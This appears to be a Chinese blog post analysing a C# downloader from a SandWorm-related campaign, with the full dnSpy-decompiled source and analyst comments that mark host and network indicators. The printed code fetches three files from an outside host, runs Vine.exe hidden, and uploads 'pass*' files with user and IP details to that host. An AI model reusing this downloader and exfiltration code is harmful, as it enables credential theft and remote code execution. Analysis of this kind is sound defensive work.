Virus_C#_SampleAnalysis

0x1 背景

这几天在做一些小结,除了二进制,也对其他方面做点记录,本篇讲C#样本的简单分析.

前几天启明有篇文章讲到了SandWorm样本,漏洞部分也没分析,就跟着文章的描述简单地过了一遍,下载到文章中提到的Down样本.用PEiD查壳,结果是 Microsoft Visual C# / Basic .NET,于是快速地做了分析.

0x2 主角登场

本来该是样本的,但个人感觉dnSpy更牛逼闪闪,话不多说,上图:
dnSpy

注:项目右键:1可以Debug,2可以保存为本地项目(见附件)
ILSpy也可以吧,喜欢的还是他俩.

2.1样本分析

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net.Http;
using System.Threading.Tasks;

namespace DownloadAndExecute
{
    /// <summary>
    /// Downloader/stager as recovered by dnSpy. Identifiers such as <c>expr_144</c>,
    /// <c>var_7_27E</c> and the <c>IL_xxx</c> labels are decompiler artifacts, not the
    /// author's names. Flow as printed: Main → DownloadFiles (three files into
    /// %APPDATA%) → launch Vine.exe hidden → if it exits with 0, UploadFiles
    /// (POST every "pass*" file found in %APPDATA%). Every network and file step sits
    /// inside a swallow-all catch, so failures are silent.
    /// </summary>
    internal class Program
    {
        // One shared client for all traffic; every URL in this listing is plain http://.
        private static readonly HttpClient client = new HttpClient();

        // Set to true only at the very end of DownloadFiles, i.e. only when all three
        // staged files were fetched or already present; gates the Vine.exe launch in Main.
        private static bool success = false;

        // Exit code of Vine.exe. Starts at 1 so the upload stage is skipped unless the
        // launched process actually returned 0.
        private static int exitCode = 1;

        /// <summary>
        /// Entry point. Blocks on DownloadFiles, launches %APPDATA%\Vine.exe with a hidden
        /// window, waits for it, and runs UploadFiles only when Vine.exe exited with 0.
        /// </summary>
        /// <remarks>
        /// Host indicator: a process created from %APPDATA%\Vine.exe with
        /// WindowStyle=Hidden and CreateNoWindow=true, parented by this assembly.
        /// </remarks>
        private static void Main(string[] args)
        {
            // Blocks the main thread until every download has finished or silently failed.
            Program.DownloadFiles().Wait();
            if (Program.success)
            {
                using (Process process = Process.Start(new ProcessStartInfo
                {
                    FileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe"),
                    WindowStyle = ProcessWindowStyle.Hidden,
                    // Same path built twice; GetDirectoryName of it is just the %APPDATA% folder.
                    WorkingDirectory = Path.GetDirectoryName(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe")),
                    CreateNoWindow = true
                }))
                {
                    process.WaitForExit();
                    Program.exitCode = process.ExitCode;
                }
            }
            // The exit status of Vine.exe decides whether the exfiltration stage runs at all.
            if (Program.exitCode == 0)
            {
                Program.UploadFiles().Wait();
            }
        }

        /// <summary>
        /// Exfiltration stage. Lists the files directly under %APPDATA% and, for each one
        /// whose name starts with "pass", reads its full text and POSTs it together with
        /// the user name, OS version string, file name and public IP as a form-encoded
        /// body to http://www.ictcoe.org.et/plugins/system/legacy/core.php. If the server
        /// replies with exactly the file name, the local file is deleted.
        /// </summary>
        /// <remarks>
        /// The goto/label layout and the never-assigned <c>num</c> are what dnSpy produced
        /// from the compiler's async state machine; as printed, <c>num</c> is read before
        /// any assignment, so this text does not compile as-is. Read it as a foreach over
        /// the directory listing with a per-file try/catch. Both catch blocks swallow every
        /// exception: a failed upload leaves the file in place and is never reported.
        /// </remarks>
        private static async Task UploadFiles()
        {
            try
            {
                int num;
                FileInfo[] array;
                int num2;
                // NOTE(review): `num` is never assigned in this listing — presumably the
                // state-machine state field surfaced by the decompiler.
                if (num > 2)
                {
                    FileInfo[] files = new DirectoryInfo(Path.Combine(new string[]
                    {
                        Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
                    })).GetFiles();
                    array = files;
                    num2 = 0;
                    goto IL_28A;
                }
                IL_70:
                // Loop body: entered from IL_28A only for files whose name starts with "pass".
                FileInfo fileInfo;
                try
                {
                    string value = File.ReadAllText(fileInfo.FullName);
                    string value2 = await Program.GetExternalIPAddress();
                    // Form fields of the POST: "data" is a fixed marker, the rest identify the
                    // host and carry the file name and its full contents.
                    FormUrlEncodedContent content = new FormUrlEncodedContent(new Dictionary<string, string>
                    {
                        {
                            "data",
                            "data"
                        },
                        {
                            "username",
                            Environment.UserName
                        },
                        {
                            "os_version",
                            Environment.OSVersion.VersionString
                        },
                        {
                            "file_path",
                            fileInfo.Name
                        },
                        {
                            "public_ip",
                            value2
                        },
                        {
                            "file_content",
                            value
                        }
                    });
                    // The server acknowledges by echoing the file name; only then is the local copy removed.
                    if (await(await Program.client.PostAsync("http://www.ictcoe.org.et/plugins/system/legacy/core.php", content)).Content.ReadAsStringAsync() == fileInfo.Name)
                    {
                        fileInfo.Delete();
                    }
                    value = null;
                }
                catch (Exception)
                {
                    // Per-file failures (read error, network error) are skipped silently.
                }
                IL_275:
                // Loop increment.
                fileInfo = null;
                num2++;
                IL_28A:
                // Loop condition: stop once the listing is exhausted, otherwise pick the next entry.
                if (num2 >= array.Length)
                {
                    array = null;
                }
                else
                {
                    fileInfo = array[num2];
                    // Name filter: only "pass*" files are uploaded; all others go straight to the increment.
                    if (fileInfo.Name.StartsWith("pass"))
                    {
                        goto IL_70;
                    }
                    goto IL_275;
                }
            }
            catch (Exception)
            {
                // Directory enumeration failures are swallowed as well.
            }
        }

        /// <summary>
        /// Fetches http://checkip.dyndns.org and scrapes the public IP out of the response
        /// body: split on ':', take the second part, drop its first character, then cut at
        /// the first '<'. Returns "" on any exception, in which case UploadFiles sends an
        /// empty "public_ip" field.
        /// </summary>
        /// <remarks>
        /// The outbound request to checkip.dyndns.org is itself a usable network indicator
        /// for this sample.
        /// </remarks>
        private static async Task<string> GetExternalIPAddress()
        {
            string result;
            try
            {
                result = (await(await Program.client.GetAsync("http://checkip.dyndns.org")).Content.ReadAsStringAsync()).Split(new char[]
                {
                    ':'
                })[1].Substring(1).Split(new char[]
                {
                    '<'
                })[0];
            }
            catch (Exception)
            {
                // Any network or parsing error collapses to an empty string.
                result = "";
            }
            return result;
        }

        /// <summary>
        /// Staging step. For each of Newtonsoft.Json.dll, System.Data.SQLite.DLL and
        /// Vine.exe: if the file is not already in %APPDATA%, download it over plain HTTP
        /// from http://www.ictcoe.org.et/plugins/system/legacy/ and write it there, then
        /// print its length to the console. Sets <c>success</c> only after all three exist.
        /// Any exception aborts the remaining downloads silently and leaves
        /// <c>success</c> false, so Main never launches Vine.exe.
        /// </summary>
        /// <remarks>
        /// Dropped artifacts to look for on a host: %APPDATA%\Newtonsoft.Json.dll,
        /// %APPDATA%\System.Data.SQLite.DLL and %APPDATA%\Vine.exe. The two DLLs are
        /// presumably dependencies of Vine.exe; the payload itself is not shown in this
        /// listing. Existing files are reused as-is — nothing is verified before it is run.
        /// </remarks>
        private static async Task DownloadFiles()
        {
            try
            {
                string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Newtonsoft.Json.dll");
                FileInfo fileInfo = new FileInfo(text);
                if (!fileInfo.Exists)
                {
                    byte[] buffer = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Newtonsoft.Json.dll")).Content.ReadAsByteArrayAsync();
                    // Writer is not in a using block: if Write throws, the handle is never closed.
                    BinaryWriter expr_144 = new BinaryWriter(new FileStream(text, FileMode.Create));
                    expr_144.Write(buffer);
                    expr_144.Close();
                }
                fileInfo = new FileInfo(text);
                // Diagnostic output left in by the author.
                Console.WriteLine("Newton soft json dll length is: " + fileInfo.Length);
                string text2 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "System.Data.SQLite.DLL");
                FileInfo fileInfo2 = new FileInfo(text2);
                if (!fileInfo2.Exists)
                {
                    byte[] var_7_27E = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/System.Data.SQLite.DLL")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_291 = new BinaryWriter(new FileStream(text2, FileMode.Create));
                    expr_291.Write(var_7_27E);
                    expr_291.Close();
                }
                fileInfo2 = new FileInfo(text2);
                Console.WriteLine("Sqlite dll length is: " + fileInfo2.Length);
                string text3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe");
                FileInfo fileInfo3 = new FileInfo(text3);
                if (!fileInfo3.Exists)
                {
                    byte[] var_8_3CB = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Vine.exe")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_3DE = new BinaryWriter(new FileStream(text3, FileMode.Create));
                    expr_3DE.Write(var_8_3CB);
                    expr_3DE.Close();
                }
                fileInfo3 = new FileInfo(text3);
                Console.WriteLine("Vine exe length is: " + fileInfo3.Length);
                // Reached only if all three files are now present; anything thrown above skips this.
                Program.success = true;
                // Presumably the state machine clearing its hoisted locals — decompiler artifact.
                text = null;
                text2 = null;
                text3 = null;
            }
            catch (Exception)
            {
                // Any failure leaves success == false; nothing is logged.
            }
        }
    }
}


0x3 Sample

Sample-请确认样本只用于测试后再下载,其他用途我概不负责-密码为国际惯例

0x4 参考文章

“沙虫”二代来袭,office全线沦陷!
